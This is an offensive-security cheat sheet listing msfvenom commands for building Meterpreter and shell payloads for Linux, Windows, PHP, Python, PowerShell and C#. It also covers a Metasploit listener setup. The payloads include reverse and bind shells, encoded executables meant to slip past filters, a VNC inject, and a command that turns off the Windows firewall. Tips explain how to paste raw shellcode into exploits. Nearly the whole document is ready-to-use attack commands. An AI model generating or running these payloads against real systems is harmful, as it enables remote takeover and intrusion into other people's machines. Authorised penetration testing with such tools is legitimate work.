Updated: 2023

Meterpreter Shells

Metasploit Listener Quick Commands

use exploit/multi/handler
# Linux
set payload linux/x86/meterpreter/reverse_tcp
# Windows
set payload windows/meterpreter/reverse_tcp

Linux

Linux Meterpreter Reverse Shell - Staged x86

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=YourIP LPORT=YourPort -f elf > ms_x86.elf

Linux Meterpreter Reverse Shell - Staged x64

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=YourIP LPORT=YourPort -f elf > ms_x64.elf

Linux Meterpreter Reverse Shell - Inline x86

msfvenom -p linux/x86/meterpreter_reverse_tcp LHOST=YourIP LPORT=YourPort -f elf > mi_x86.elf

Linux Meterpreter Reverse Shell - Inline x64

msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=YourIP LPORT=YourPort -f elf > mi_x64.elf

Windows

Windows Meterpreter Reverse Shell - Staged x86

msfvenom -p windows/meterpreter/reverse_tcp LHOST=YourIP LPORT=YourPort -f exe > ms_x86.exe

Windows Meterpreter Reverse Shell - Staged x64

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=YourIP LPORT=YourPort -f exe > ms_x64.exe

Windows Meterpreter Reverse Shell - Inline x86

msfvenom -p windows/meterpreter_reverse_tcp LHOST=YourIP LPORT=YourPort -f exe > mi_x86.exe

Windows Meterpreter Reverse Shell - Inline x64

msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=YourIP LPORT=YourPort -f exe > mi_x64.exe

More Payloads

Exec Perl Reverse Shell within PHP

msfvenom -p php/reverse_perl LHOST=YourIP LPORT=YourPort -f raw

Windows CMD Reverse Shell - Encoded with shikata_ga_nai with 4 iterations

msfvenom -p windows/shell/reverse_tcp LHOST=YourIP LPORT=YourPort -f exe -e x86/shikata_ga_nai -i 4 > shell-cmd.exe

Windows Execute a Command - eg: turn off firewall

msfvenom -f exe -p windows/exec CMD="netsh advfirewall set allprofiles state off" -o command.exe

Python Reverse Shell for Unix

msfvenom -p cmd/unix/reverse_python LHOST=YourIP LPORT=YourPort -f raw

Windows Powershell Reverse Shell

msfvenom -p windows/powershell_reverse_tcp LHOST=YourIP LPORT=YourPort -f raw

Windows Reverse Shell Shellcode to put into a C# App

msfvenom -p windows/shell/reverse_tcp LHOST=YourIP LPORT=YourPort -f csharp

Windows Bind Shell as a VBS script

msfvenom -p windows/shell/bind_tcp LHOST=YourIP LPORT=YourPort -f vbs -o shell.vbs

View Windows Desktop with VNC Viewer

msfvenom -p windows/vncinject/reverse_tcp LHOST=YourIP LPORT=YourPort -f exe > vnc.exe

Usage Tips

List Payloads and Payload options

msfvenom --list payloads
msfvenom -p [payload] --payload-options
msfvenom -p windows/meterpreter/reverse_tcp --payload-options

List Encoders

msfvenom --list encoders

Encoding your payload in x86/shikata_ga_nai is great, but sometimes your shell code has bad chars and shikata_gi_nai may throw an error on generation. Using this command you should be able to find an encoder that will fit your parameters.

Formats

You can generate the shell output in two different formats: Executable or Transform. It will depend on the scenario as to which one you’ll choose.

Executable - It’s own executable shell with an extension .elf .exe .py .php etc. Eg: You have an unstable non-interactive low priv shell and you want to get something more stable and efficient on a vulnerable windows machine. You’d generate the payload as an .exe, create a listener, upload and execute.

Transform - Raw shellcode that can be pasted into an existing exploit. The transform format will depend on what that exploit is written in. Eg: You need to create shell code to paste into your code execution exploit that’s ultimately ran by a vulnerable public facing web app in javascript. To format your shellcode, you may want to use: –format js_le (JavaScript_LittleEndian)

List Formats

msfvenom --list formats